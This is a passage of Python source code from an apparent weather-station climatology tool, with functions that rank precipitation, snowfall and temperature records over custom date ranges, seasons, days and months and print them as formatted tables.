2nd (optional) date, ensure only a Month and Date are entered ***") elif any(type(x) != int for x in [date2[0],date2[1]]): return print("*** OOPS! Ensure that only integers are entered ***") if attribute not in ["temp","temps","temperature","temperatures","tmax","tmin","tavg","prcp","precip","rain","snow"]: return print("* OOPS! Attribute must be 'temp' or 'prcp'. Try again!") if type(qty) != int or qty > 50 or qty < 5: return print("* SORRY! Ensure desired quantity is an integer in the range [5,50]") if attribute in ["prcp","precip","rain","snow"]: attribute = "prcp" if attribute in ["temp","temps","temperature","temperatures","tmax","tmin","tavg"]: attribute = "temp" if len(date2) == 2: m2 = date2[0] d2 = date2[1] else: m2 = 12 d2 = 31 if m2 == m1: if d2 == d1: return print("*** OOPS! Ensure different dates! ***") if m1 == 2 and d1 == 29: d1 = 28 if m2 == 2 and d2 == 29: d2 = 28 # Determine total length of period (used for exclusion calculation) s = datetime.date(1900,m1,d1) test = datetime.date(1900,m2,d2) if test > s: e = test else: e = datetime.date(1901,m2,d2) timelength = (e - s).days + 1 if timelength <= 5: EXCLD = timelength-1 elif timelength == 6: EXCLD = 4 elif timelength == 7: EXCLD = excludeweek elif timelength == 8: EXCLD = excludeweek elif timelength in [28,29,30,31]: EXCLD = excludemonth elif timelength >= 350: EXCLD = excludeyear else: EXCLD = round(excludecustom * timelength) e = {} # Will hold the date-to-date (represented by a parent year) stats for YYYY in valid_yrs: startday = datetime.date(YYYY,m1,d1) incr_day = startday if m2 < m1: endday = datetime.date(YYYY+1,m2,d2) # if end month is less, the results will bleed into the following year elif m2 == m1: # Deals with if the months of the dates are exactly the same if d2 < d1: endday = datetime.date(YYYY+1,m2,d2) # like above, if month is the same, but date is less, results will bleed into following year else: endday = datetime.date(YYYY,m2,d2) # OTHERWISE, it is assumed the same year else: endday = datetime.date(YYYY,m2,d2) # If month2 is > than month 1, the active year will be used if endday.year > max(valid_yrs): break #if YYYY not in e: e[YYYY] = {"recordqty":0, "prcp":[],"prcpDAYS":0,"snow":[],"snowDAYS":0, "tempAVGlist":[],"tmax":[],"tmin":[]} while incr_day <= endday: y = incr_day.year; m = incr_day.month; d = incr_day.day if y in clmt and m in clmt[y] and d in clmt[y][m]: e[YYYY]["recordqty"] += 1 # PRCP if clmt[y][m][d].prcpQ in ignoreflags and clmt[y][m][d].prcp not in ["9999","-9999",""]: if float(clmt[y][m][d].prcp) > 0: e[YYYY]["prcp"].append(round(float(clmt[y][m][d].prcp),2)) if float(clmt[y][m][d].prcp) > 0 or clmt[y][m][d].prcpM == "T": e[YYYY]["prcpDAYS"] += 1 if clmt[y][m][d].prcpQ in ignoreflags and clmt[y][m][d].prcp == "" and clmt[y][m][d].prcpM == "T": e[YYYY]["prcpDAYS"] += 1 # SNOW if clmt[y][m][d].snowQ in ignoreflags and clmt[y][m][d].snow not in ["9999","-9999",""]: if float(clmt[y][m][d].snow) > 0: e[YYYY]["snow"].append(round(float(clmt[y][m][d].snow),2)) if float(clmt[y][m][d].snow) > 0 or clmt[y][m][d].snowM == "T": e[YYYY]["snowDAYS"] += 1 if clmt[y][m][d].snowQ in ignoreflags and clmt[y][m][d].snow == "" and clmt[y][m][d].snowM == "T": e[YYYY]["snowDAYS"] += 1 # TAVG if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""] and clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmin not in ["9999","-9999",""] and int(clmt[y][m][d].tmax) >= int(clmt[y][m][d].tmin): e[YYYY]["tempAVGlist"].append(int(clmt[y][m][d].tmax)) e[YYYY]["tempAVGlist"].append(int(clmt[y][m][d].tmin)) # TMAX if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""]: if clmt[y][m][d].tmin != "" and int(clmt[y][m][d].tmax) >= int(clmt[y][m][d].tmin): e[YYYY]["tmax"].append(int(clmt[y][m][d].tmax)) # TMIN if clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmin not in ["9999","-9999",""]: if clmt[y][m][d].tmax != "" and int(clmt[y][m][d].tmin) <= int(clmt[y][m][d].tmax): e[YYYY]["tmin"].append(int(clmt[y][m][d].tmin)) incr_day += datetime.timedelta(days=1) # GO ON TO TEST NEXT DAY E_prcp = [] E_prcp_asc = [] E_prcpDAYS = [] E_prcpDAYS_asc = [] E_snow = [] E_snow_asc = [] E_snowDAYS = [] E_snowDAYS_asc = [] E_tavg = [] E_tmax = [] E_tmin = [] for YYYY in e: try: E_prcp.append(e_attr(YYYY,round(sum(e[YYYY]["prcp"]),2))) E_prcpDAYS.append(e_attr(YYYY,e[YYYY]["prcpDAYS"])) if e[YYYY]["recordqty"] > EXCLD: E_prcp_asc.append(e_attr(YYYY,round(sum(e[YYYY]["prcp"]),2))) E_prcpDAYS_asc.append(e_attr(YYYY,e[YYYY]["prcpDAYS"])) E_snow.append(e_attr(YYYY,round(sum(e[YYYY]["snow"]),1))) if e[YYYY]["recordqty"] > EXCLD: E_snow_asc.append(e_attr(YYYY,round(sum(e[YYYY]["snow"]),1))) E_snowDAYS.append(e_attr(YYYY,e[YYYY]["snowDAYS"])) if e[YYYY]["recordqty"] > EXCLD: E_snowDAYS_asc.append(e_attr(YYYY,e[YYYY]["snowDAYS"])) except: pass try: if len(e[YYYY]["tempAVGlist"]) > EXCLD * 2: E_tavg.append(e_attr(YYYY,round(mean(e[YYYY]["tempAVGlist"]),1))) except: pass try: if len(e[YYYY]["tmax"]) > EXCLD: E_tmax.append(e_attr(YYYY,round(mean(e[YYYY]["tmax"]),1))) except: pass try: if len(e[YYYY]["tmin"]) > EXCLD: E_tmin.append(e_attr(YYYY,round(mean(e[YYYY]["tmin"]),1))) except: pass E_LENGTHS_OF_ALL = [] #E_prcp_asc = E_prcp.copy() E_prcp.sort(key=lambda x:x.number,reverse=True); E_LENGTHS_OF_ALL.append(len(E_prcp)) E_prcp_asc.sort(key=lambda x:x.number); E_LENGTHS_OF_ALL.append(len(E_prcp_asc)) #E_prcpDAYS_asc = E_prcpDAYS.copy() E_prcpDAYS.sort(key=lambda x:x.number,reverse=True); E_LENGTHS_OF_ALL.append(len(E_prcpDAYS)) E_prcpDAYS_asc.sort(key=lambda x:x.number); E_LENGTHS_OF_ALL.append(len(E_prcpDAYS_asc)) E_snow.sort(key=lambda x:x.number,reverse=True); E_LENGTHS_OF_ALL.append(len(E_snow)) E_snow_asc.sort(key=lambda x:x.number); E_LENGTHS_OF_ALL.append(len(E_snow_asc)) E_snowDAYS.sort(key=lambda x:x.number,reverse=True); E_LENGTHS_OF_ALL.append(len(E_snowDAYS)) E_snowDAYS_asc.sort(key=lambda x:x.number); E_LENGTHS_OF_ALL.append(len(E_snowDAYS_asc)) E_tavg_asc = E_tavg.copy() E_tavg.sort(key=lambda x:x.number,reverse=True); E_LENGTHS_OF_ALL.append(len(E_tavg)) E_tavg_asc.sort(key=lambda x:x.number); E_LENGTHS_OF_ALL.append(len(E_tavg_asc)) E_tmax_asc = E_tmax.copy() E_tmax.sort(key=lambda x:x.number,reverse=True); E_LENGTHS_OF_ALL.append(len(E_tmax)) E_tmax_asc.sort(key=lambda x:x.number); E_LENGTHS_OF_ALL.append(len(E_tmax_asc)) E_tmin_asc = E_tmin.copy() E_tmin.sort(key=lambda x:x.number,reverse=True); E_LENGTHS_OF_ALL.append(len(E_tmin)) E_tmin_asc.sort(key=lambda x:x.number); E_LENGTHS_OF_ALL.append(len(E_tmin_asc)) if "customStatsRun" in kwargs and kwargs["customStatsRun"] == True: prcpaschist = sorted(list(set([x.number for x in E_prcp_asc]))) prcpdeschist = sorted(list(set([x.number for x in E_prcp])),reverse=True) prcpDAYSaschist = sorted(list(set([x.number for x in E_prcpDAYS_asc]))) prcpDAYSdeschist = sorted(list(set([x.number for x in E_prcpDAYS])),reverse=True) snowaschist = sorted(list(set([x.number for x in E_snow_asc]))) snowdeschist = sorted(list(set([x.number for x in E_snow])),reverse=True) snowDAYSaschist = sorted(list(set([x.number for x in E_snowDAYS_asc]))) snowDAYSdeschist = sorted(list(set([x.number for x in E_snowDAYS])),reverse=True) tmaxaschist = sorted(list(set([x.number for x in E_tmax_asc]))) tmaxdeschist = sorted(list(set([x.number for x in E_tmax])),reverse=True) tminaschist = sorted(list(set([x.number for x in E_tmin_asc]))) tmindeschist = sorted(list(set([x.number for x in E_tmin])),reverse=True) tavgaschist = sorted(list(set([x.number for x in E_tavg_asc]))) tavgdeschist = sorted(list(set([x.number for x in E_tavg])),reverse=True) return prcpaschist, prcpdeschist, prcpDAYSaschist, prcpDAYSdeschist, snowaschist, snowdeschist, snowDAYSaschist, snowDAYSdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist else: print("") if attribute == "prcp": print("{:^100}".format("Ranked Precipitation Amounts and Days for {} {} thru {} {}".format(calendar.month_abbr[startday.month],startday.day,calendar.month_abbr[endday.month],endday.day))) print("{:^103}".format("{}, {}".format(clmt["station"],clmt["station_name"]))) if EXCLD <= 5: print("{:^103}".format("Periods with {} Total days of Data".format(EXCLD+1))) else: print("{:^103}".format("Periods with >= {} Day(s) of Data".format(EXCLD+1))) print("{:-^103}".format("")) print("{:^70} {:^33}".format("Rain","Snow")) print("{:-^70} {:-^33}".format("","")) print("{:^18}|{:^18}|{:^15}|{:^15}|{:^17}|{:^15}".format("Wettest","Driest","Most Days","Least Days","Snowiest","Most Days")) print("{:-^18}|{:-^18}|{:-^15}|{:-^15}|{:-^17}|{:-^15}".format("","","","","","")) i = 1;j = 1;k = 1;l = 1;m = 1;n = 1 printed_j = 0; printed_l = 0 ranked_i = [];ranked_j = [];ranked_k = [];ranked_l = [];ranked_m = [];ranked_n = [] for x in range(min(E_LENGTHS_OF_ALL)): if x == 0: print(" {:2}{} {:4} {:>6} | {:2}{} {:4} {:>6} | {:2}{} {:4} {:3} | {:2}{} {:4} {:3} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>3} ".format( 1,".",E_prcp[x].year,"{:.2f}".format(E_prcp[x].number), 1,".",E_prcp_asc[x].year,"{:.2f}".format(E_prcp_asc[x].number), 1,".",E_prcpDAYS[x].year,E_prcpDAYS[x].number, 1,".",E_prcpDAYS_asc[x].year,E_prcpDAYS_asc[x].number, 1 if E_snow[x].number else "","." if E_snow[x].number > 0 else " ", E_snow[x].year if E_snow[x].number > 0 else "","{:.1f}".format(E_snow[x].number) if E_snow[x].number > 0 else "", 1 if E_snowDAYS[x].number > 0 else "","." if E_snowDAYS[x].number > 0 else " ", E_snowDAYS[x].year if E_snowDAYS[x].number > 0 else "",E_snowDAYS[x].number if E_snowDAYS[x].number > 0 else "")) ranked_i.append(i);ranked_j.append(j);ranked_k.append(k);ranked_l.append(l);ranked_m.append(m);ranked_n.append(n) else: if i not in ranked_i and i <= qty: ranked_i.append(i) if j not in ranked_j and j <= qty: ranked_j.append(j) #printed_j += 1 if k not in ranked_k and k <= qty: ranked_k.append(k) if l not in ranked_l and l <= qty: ranked_l.append(l) #printed_l += 1 if m not in ranked_m and m <= qty: ranked_m.append(m) if n not in ranked_n and n <= qty: ranked_n.append(n) if E_prcp[x].number != E_prcp[x-1].number: i += 1 if E_prcp_asc[x].number != E_prcp_asc[x-1].number: j += 1 if E_prcpDAYS[x].number != E_prcpDAYS[x-1].number: k += 1 if E_prcpDAYS_asc[x].number != E_prcpDAYS_asc[x-1].number: l += 1 if E_snow[x].number != E_snow[x-1].number: m += 1 if E_snowDAYS[x].number != E_snowDAYS[x-1].number: n += 1 if E_prcp[x].number == 0: i = qty + 1 #if printed_j == len(valid_yrs)-10: j = qty + 1 if E_prcpDAYS[x].number == 0: k = qty + 1 #if printed_l == len(valid_yrs)-10: l = qty + 1 if E_snow[x].number == 0: m = qty + 1 if E_snowDAYS[x].number == 0: n = qty + 1 if i <= qty or j <= qty or k <= qty or l <= qty or m <= qty or n <= qty: print(" {:2}{} {:4} {:>6} | {:2}{} {:4} {:>6} | {:2}{} {:4} {:3} | {:2}{} {:4} {:3} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>3} ".format( i if i not in ranked_i and i <= qty else "","." if i not in ranked_i and i <= qty else " ", E_prcp[x].year if i <= qty else "","{:.2f}".format(E_prcp[x].number) if i <= qty else "", j if j not in ranked_j and j <= qty else "","." if j not in ranked_j and j <= qty else " ", E_prcp_asc[x].year if j <= qty else "","{:.2f}".format(E_prcp_asc[x].number) if j <= qty else "", k if k not in ranked_k and k <= qty else "","." if k not in ranked_k and k <= qty else " ", E_prcpDAYS[x].year if k <= qty else "",E_prcpDAYS[x].number if k <= qty else "", l if l not in ranked_l and l <= qty else "","." if l not in ranked_l and l <= qty else " ", E_prcpDAYS_asc[x].year if l <= qty else "",E_prcpDAYS_asc[x].number if l <= qty else "", m if m not in ranked_m and m <= qty else "","." if m not in ranked_m and m <= qty else " ", E_snow[x].year if m <= qty else "","{:.1f}".format(E_snow[x].number) if m <= qty else "", n if n not in ranked_n and n <= qty else "","." if n not in ranked_n and n <= qty else " ", E_snowDAYS[x].year if n <= qty else "",E_snowDAYS[x].number if n <= qty else "")) if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty: break if attribute == "temp": print("{:^111}".format("Ranked Temperatures for {} {} thru {} {}".format(calendar.month_abbr[startday.month],startday.day,calendar.month_abbr[endday.month],endday.day))) print("{:^111}".format("{}, {}".format(clmt["station"],clmt["station_name"]))) print("{:^111}".format("Periods with >= {} Day(s) of Data".format(EXCLD+1))) print("{:-^111}".format("")) print("{:^36}|{:^37}|{:^36}".format("AVG TEMP","TMAX","TMIN")) print("{:-^36}|{:-^37}|{:-^36}".format("","","")) print("{:^17}|{:^18}|{:^18}|{:^18}|{:^18}|{:^17}".format("Warmest","Coolest","Warmest","Coolest","Warmest","Coolest")) print("{:-^17}|{:-^18}|{:-^18}|{:-^18}|{:-^18}|{:-^17}".format("","","","","","")) i = 1; j = 1; k = 1; l = 1; m = 1; n = 1 ranked_i = []; ranked_j = []; ranked_k = []; ranked_l = []; ranked_m = []; ranked_n = [] for x in range(len(E_tmax)): if x == 0: print("{:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5}".format( 1,".",E_tavg[x].year,"{:.1f}".format(E_tavg[x].number), 1,".",E_tavg_asc[x].year,"{:.1f}".format(E_tavg_asc[x].number), 1,".",E_tmax[x].year,"{:.1f}".format(E_tmax[x].number), 1,".",E_tmax_asc[x].year,"{:.1f}".format(E_tmax_asc[x].number), 1,".",E_tmin[x].year,"{:.1f}".format(E_tmin[x].number), 1,".",E_tmin_asc[x].year,"{:.1f}".format(E_tmin_asc[x].number))) ranked_i.append(i); ranked_j.append(j); ranked_k.append(k); ranked_l.append(l); ranked_m.append(m); ranked_n.append(n) else: if i not in ranked_i and i <= qty: ranked_i.append(i) if j not in ranked_j and j <= qty: ranked_j.append(j) if k not in ranked_k and k <= qty: ranked_k.append(k) if l not in ranked_l and l <= qty: ranked_l.append(l) if m not in ranked_m and m <= qty: ranked_m.append(m) if n not in ranked_n and n <= qty: ranked_n.append(n) if E_tavg[x].number != E_tavg[x-1].number: i += 1 if E_tavg_asc[x].number != E_tavg_asc[x-1].number: j += 1 if E_tmax[x].number != E_tmax[x-1].number: k += 1 if E_tmax_asc[x].number != E_tmax_asc[x-1].number: l += 1 if E_tmin[x].number != E_tmin[x-1].number: m += 1 if E_tmin_asc[x].number != E_tmin_asc[x-1].number: n += 1 if i <= qty or j <= qty or k <= qty or l <= qty or m <= qty or n <= qty: print("{:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5}".format( i if i not in ranked_i and i <= qty else "","." if i not in ranked_i and i <= qty else " ", E_tavg[x].year if i <= qty else "","{:.1f}".format(E_tavg[x].number) if i <= qty else "", j if j not in ranked_j and j <= qty else "","." if j not in ranked_j and j <= qty else " ", E_tavg_asc[x].year if j <= qty else "","{:.1f}".format(E_tavg_asc[x].number) if j <= qty else "", k if k not in ranked_k and k <= qty else "","." if k not in ranked_k and k <= qty else " ", E_tmax[x].year if k <= qty else "","{:.1f}".format(E_tmax[x].number) if k <= qty else "", l if l not in ranked_l and l <= qty else "","." if l not in ranked_l and l <= qty else " ", E_tmax_asc[x].year if l <= qty else "","{:.1f}".format(E_tmax_asc[x].number) if l <= qty else "", m if m not in ranked_m and m <= qty else "","." if m not in ranked_m and m <= qty else " ", E_tmin[x].year if m <= qty else "","{:.1f}".format(E_tmin[x].number) if m <= qty else "", n if n not in ranked_n and n <= qty else "","." if n not in ranked_n and n <= qty else " ", E_tmin_asc[x].year if n <= qty else "","{:.1f}".format(E_tmin_asc[x].number) if n <= qty else "")) if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty: break print("") def allDayRank(attribute,qty,**kw): """Returns a list of rankings, comparing only specific days to one another. If season keyword is present, month keyword will be ignored. If season and year are specified, only results from the season from the specific year will be used. If year and month are specified, only data from that time period will be used. If only month is specified, all data occurring from that month, regardless of year, will be used. allDayRank(attribute,quantity,**kwargs) Accepted Attributes: "prcp", "snow", "snwd", "tmax", "tmin", "tavg" Keyword Arguments (displayed in heirarchal order): season="season" -> limit season <"spring"|"summer"|"fall"|"winter"> year=YYYY -> limit results to a specific year month=M -> limit results to a specific month ascending=False -> alters order of data (only affects temp attrs) custom=[m1,d1,m2,d2] -> limits results if the record falls within the date-range given EXAMPLE: allDayRank("snow",10) -> top 10 ranks all days acc. to snow allDayRank("prcp",15,season="summer") -> top 15 rain days in summer allDayRank("tmax",10,season="fall",year=2005) -> top 10 warmest daily highs from Fall 2005 allDayRank("tmin",10,year=2009,ascending=True) -> top 10 coolest daily lows in 2009 allDayRank("prcp",20,custom=[12,3,5,1]) -> top 20 rain-days between Dec3 and May1 """ # clmt_vars_days = {"prcp":{},"snow":{},"snwd":{},"tavg":{},"tmax":{},"tmin":{}} # clmt_vars_days["prcp"][amount] = [list, of, days, that, had, that, value] # consider adding a "finite" kwarg. This setting would only report the quantity of days that a match was made rather than a potentially long list of days # consider adding an "order" or "reverse" kwarg valid_yrs = sorted([x for x in clmt.keys() if type(x) == int]) valid_metyrs = sorted([x for x in metclmt.keys() if type(x) == int]) hascustom = False hasseason = False hasyear = False hasmonth = False daysinmonths = ["_",31,28,31,30,31,30,31,31,30,31,30,31] # used to quickly determine validity of dates entered with custom keyword #ERROR CHECKS if attribute not in ["prcp","snow","snwd","tmax","tmin","tavg"]: return print('OOPS! "{}" is an Invalid Attribute. Try Again! Valid Attributes: "prcp","snow","snwd","tmax","tmin","tavg"'.format(attribute)) if type(qty) != int: return print("OOPS! Ensure the quantity is an integer! Try again!") # Custom Date Range if "custom" in kw: try: m1 = kw["custom"][0] d1 = kw["custom"][1] m2 = kw["custom"][2] d2 = kw["custom"][3] except: return print("OOPS! Something is wrong with the dates. Ensure a format of [m1,d1,m2,d2]") if type(kw["custom"]) not in [list,tuple]: return print("OOPS! Pass your custom range in a list. ex: [m1,d1,m2,d2]") elif any(type(x) != int for x in kw["custom"]) or len(kw["custom"]) != 4: return print("OOPS! Ensure all variables passed in your list are integers representing month/dates of interest and that a start/end month day sets are included, ex: [m1,d1,m2,d2]") elif (1 <= m1 <= 12) == False or (1 <= m2 <= 12) == False: return print("OOPS! An invalid month was entered.") elif (d1 <= 0 or d1 > daysinmonths[m1]) or (d2 <= 0 or d2 > daysinmonths[m2]): return print("OOPS! One or both of the dates are invalid.") elif m1 == m2 and d1 == d2: return print("OOPS! The first and second dates cannot be alike.") hascustom = True # If February 29, we want to default to the 28th if m1 == 2 and d1 == 29: d1 = 28 if m2 == 2 and d2 == 29: d2 = 28 # Specified Season elif "season" in kw: if kw["season"].lower() not in ["spring","summer","fall","winter"]: return print('OOPS! "{}" is an invalid season. Try again! Valid Seasons (all lower case):"spring","summer","fall","winter"'.format(kw["season"])) hasseason = True # for specifying a year of a season if "year" in kw: hasyear = True YEAR = int(kw["year"]) if YEAR not in valid_yrs: return print("OOPS! No data for the year {} found. Try again!".format(YEAR)) # Specifying a year elif "year" in kw: hasyear = True YEAR = int(kw["year"]) if YEAR not in clmt: return print("OOPS! No data for the year {} found. Try again!".format(YEAR)) # Focusing on a specific month in a specific year if "month" in kw: hasmonth = True MONTH = int(kw["month"]) if MONTH not in range(1,12+1): return print("OOPS! Invalid Month. Try again!") if MONTH not in clmt[YEAR]: return print("OOPS! No data for {} {} found. Try again!".format(calendar.month_name[MONTH],YEAR)) # Specifying a month elif "month" in kw: hasmonth = True MONTH = int(kw["month"]) if MONTH not in range(1,12+1): return print("OOPS! Invalid Month. Try again!") ########################## r = 0 printed = [] # Will hold the printed rankings print("\n-----------------------------------------------") # HEADER ------------------ if hascustom == True: print("Top {} Daily {} Records for the Range of {} {} thru {} {}".format( qty,attribute.upper(),d1,calendar.month_abbr[m1].upper(), d2,calendar.month_abbr[m2].upper() )) elif hasseason == True: if hasyear == True: print("Top {} Daily {} Records for {} {}".format(qty,attribute.upper(),kw["season"].capitalize(),YEAR)) else: print("Top {} Daily {} Records for {}".format(qty,attribute.upper(),kw["season"].capitalize())) elif hasyear == True: if hasmonth == True: print("Top {} Daily {} Records for {} {}".format(qty,attribute.upper(),calendar.month_name[MONTH],YEAR)) else: print("Top {} Daily {} Records for {}".format(qty,attribute.upper(),YEAR)) elif hasmonth == True: print("Top {} Daily {} Records for {}".format(qty,attribute.upper(),calendar.month_name[MONTH])) else: print("Top {} Daily {} Records for All-Time".format(qty,attribute.upper())) # ------------------------- # ------------------------- print("{}, {}".format(clmt["station"],clmt["station_name"])) if "ascending" in kw and attribute in ["tmax","tmin","tavg"]: if kw["ascending"] == True: keys = sorted([key for key in clmt_vars_days[attribute].keys()]) print("--- Coolest to Warmest ---") else: keys = sorted([key for key in clmt_vars_days[attribute].keys()],reverse=True) if attribute in ["tmax","tmin","tavg"]: print("--- Warmest to Coolest ---") print("-----------------------------------------------") # ------------------------- validated = {} # 12-3 to 1,10 # (1959,1,7) if hascustom == True: for x in keys: for y in range(len(clmt_vars_days[attribute][x])): # When the 2nd month refers to an earlier month(or the same) if datetime.date(2100,m2,d2) < datetime.date(2100,m1,d1): try: if (clmt_vars_days[attribute][x][y] >= datetime.date(clmt_vars_days[attribute][x][y].year,m1,d1)) or (clmt_vars_days[attribute][x][y] <= datetime.date(clmt_vars_days[attribute][x][y].year,m2,d2)): if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: validated[x].append(clmt_vars_days[attribute][x][y]) except Exception as e: pass # When the 2nd month is later than the first month else: if datetime.date(clmt_vars_days[attribute][x][y].year,m1,d1) <= clmt_vars_days[attribute][x][y] <= datetime.date(clmt_vars_days[attribute][x][y].year,m2,d2): if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: validated[x].append(clmt_vars_days[attribute][x][y]) elif hasseason == True and hasyear == False: # Only assess a season # metclmt[y][s]["valid"] = [3,4,5] # clmt_vars_days[attribute][x][y] for x in keys: for y in range(len(clmt_vars_days[attribute][x])): if clmt_vars_days[attribute][x][y].month <= 2 and clmt_vars_days[attribute][x][y].year-1 in metclmt and clmt_vars_days[attribute][x][y].month in metclmt[clmt_vars_days[attribute][x][y].year-1][kw["season"]]["valid"]: if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: validated[x].append(clmt_vars_days[attribute][x][y]) elif clmt_vars_days[attribute][x][y].month >= 3 and clmt_vars_days[attribute][x][y].month in metclmt[clmt_vars_days[attribute][x][y].year][kw["season"]]["valid"]: if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: validated[x].append(clmt_vars_days[attribute][x][y]) elif hasseason == True and hasyear == True: # Only assess a season of a particular year # metclmt[y][s]["valid"] = [3,4,5] # clmt_vars_days[attribute][x][y] for x in keys: for y in range(len(clmt_vars_days[attribute][x])): if kw["season"].lower() == "winter": if clmt_vars_days[attribute][x][y].month in metclmt[clmt_vars_days[attribute][x][y].year][kw["season"]]["valid"]: if clmt_vars_days[attribute][x][y].month in [1,2] and clmt_vars_days[attribute][x][y].year == YEAR+1: if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: validated[x].append(clmt_vars_days[attribute][x][y]) if clmt_vars_days[attribute][x][y].month == 12 and clmt_vars_days[attribute][x][y].year == YEAR: if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: validated[x].append(clmt_vars_days[attribute][x][y]) else: if clmt_vars_days[attribute][x][y].year == YEAR and clmt_vars_days[attribute][x][y].month in metclmt[clmt_vars_days[attribute][x][y].year][kw["season"]]["valid"]: if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: validated[x].append(clmt_vars_days[attribute][x][y]) elif hasyear == True and hasmonth == False: # Only assess a particular year for x in keys: for y in range(len(clmt_vars_days[attribute][x])): if clmt_vars_days[attribute][x][y].year == YEAR: if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: validated[x].append(clmt_vars_days[attribute][x][y]) elif hasyear == True and hasmonth == True: # Only assess a particular month of a particular year for x in keys: for y in range(len(clmt_vars_days[attribute][x])): if clmt_vars_days[attribute][x][y].year == YEAR and clmt_vars_days[attribute][x][y].month == MONTH: if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: validated[x].append(clmt_vars_days[attribute][x][y]) elif hasmonth == True: # Only assess data from a particular month for x in keys: for y in range(len(clmt_vars_days[attribute][x])): if clmt_vars_days[attribute][x][y].month == MONTH: if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: validated[x].append(clmt_vars_days[attribute][x][y]) else: # Assesses data from the entire record for x in keys: for y in range(len(clmt_vars_days[attribute][x])): if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: validated[x].append(clmt_vars_days[attribute][x][y]) for x in validated: r += 1 if r > qty: break for y in range(len(validated[x])): if attribute == "prcp": print("{:>2}{} {:>5.2f} - {}".format(r if r not in printed else " ","." if r not in printed else " ",x,validated[x][y])) elif attribute in ["snow","snwd","tavg"]: print("{:>2}{} {:>5.1f} - {}".format(r if r not in printed else " ","." if r not in printed else " ",x,validated[x][y])) else: print("{:>2}{} {:>3} - {}".format(r if r not in printed else " ","." if r not in printed else " ",x,validated[x][y])) if r not in printed: printed.append(r) #------------------------------------------- print("") def allMonthRank(attribute,qty,**kw): """Returns a list of rankings, comparing only specific months to one another. Optional season kewyord included to limit results to a specific season. Optional ascending keyword, if set to True, will reverse the order of results allMonthRank(attribute,quantity,**kwargs) Accepted Attributes: "prcp", "prcpDAYS", "snow", "snowDAYS", "snwd", "snwdDAYS", "tmax","tmin", "tavg" Keyword Arguments (Optional): season="season" -> limit season <"spring"|"summer"|"fall"|"winter"> ascending=False -> alters order of data (only affects temp or prcp attrs) EXAMPLE: allMonthRank("snow",10) -> top 10 ranks all months acc. to snow allMonthRank("prcp",15,season="summer") -> top 15 rain months in summer allMonthRank("tmin",10,ascending=True) -> top 10 coolest months based on avg lows """ valid_yrs = sorted([x for x in clmt.keys() if type(x) == int]) valid_metyrs = sorted([x for x in metclmt.keys() if type(x) == int]) valid_season = {"spring":[3,4,5],"summer":[6,7,8],"fall":[9,10,11],"winter":[12,1,2]} hasseason = False #ERROR CHECKS if attribute not in ["prcp","prcpDAYS","snow","snowDAYS","snwd","snwdDAYS","tmax","tmin","tavg"]: return print('OOPS! "{}" is an Invalid Attribute. Try Again! Valid Attributes: "prcp","snow",,"snowDAYS","snwd","snwdDAYS","tmax","tmin","tavg"'.format(attribute)) if type(qty) != int: return print("OOPS! Ensure the quantity is an integer! Try again!") # Specified Season if "season" in kw: if kw["season"].lower() not in ["spring","summer","fall","winter"]: return print('OOPS! "{}" is an invalid season. Try again! Valid Seasons (all lower case):"spring","summer","fall","winter"'.format(kw["season"])) hasseason = True ########################## r = 0 printed = [] # Will hold the printed rankings appendr = False print("\n-----------------------------------------------") # HEADER ------------------ if hasseason == True: print("Top {} Monthly {} Records Inclusive of {} Months Only".format(qty,attribute.upper(),kw["season"].capitalize())) else: print("Top {} Monthly {} Records for All-Time".format(qty,attribute.upper())) # ------------------------- print("{}, {}".format(clmt["station"],clmt["station_name"])) if "ascending" in kw and kw["ascending"] == True and attribute not in ["snow","snowDAYS","snwd","snwdDAYS"]: keys = sorted([key for key in clmt_vars_months[attribute].keys()]) if attribute in ["tmax","tmin","tavg"]: print("--- Coolest to Warmest ---") if attribute in ["prcp"]: print("--- Driest to Wettest ---") else: keys = sorted([key for key in clmt_vars_months[attribute].keys()],reverse=True) if attribute in ["tmax","tmin","tavg"]: print("--- Warmest to Coolest ---") if attribute in ["prcp"]: print("--- Wettest to Driest ---") if attribute in ["prcpDAYS","snow","snowDAYS","snwd","snwdDAYS"]: print("--- Greatest to Least ---") print("-----------------------------------------------") # ------------------------- if hasseason == True: # Only assess a season # metclmt[y][s]["valid"] = [3,4,5] # clmt_vars_days[attribute][x][y] metkeys = {} for x in keys: for y in range(len(clmt_vars_months[attribute][x])): if clmt_vars_months[attribute][x][y].month in valid_season[kw["season"]]: if x not in metkeys: metkeys[x] = [clmt_vars_months[attribute][x][y]] else: metkeys[x].append(clmt_vars_months[attribute][x][y]) #for x in metkeys: #print("{} - {}".format(x,metkeys[x])) for x in metkeys: r += 1 if r > qty: break for y in range(len(metkeys[x])): if metkeys[x][y].month <= 2: if attribute == "tavg": if "ascending" not in kw or "ascending" in kw and kw["ascending"] == False or "ascending" in kw and kw["ascending"] == True and clmt[metkeys[x][y].year][metkeys[x][y].month]["recordqty"] > excludemonth * 2: appendr = True print("{:>2}{} {:6.1f} - {} {}".format(r if r not in printed else " ","." if r not in printed else " 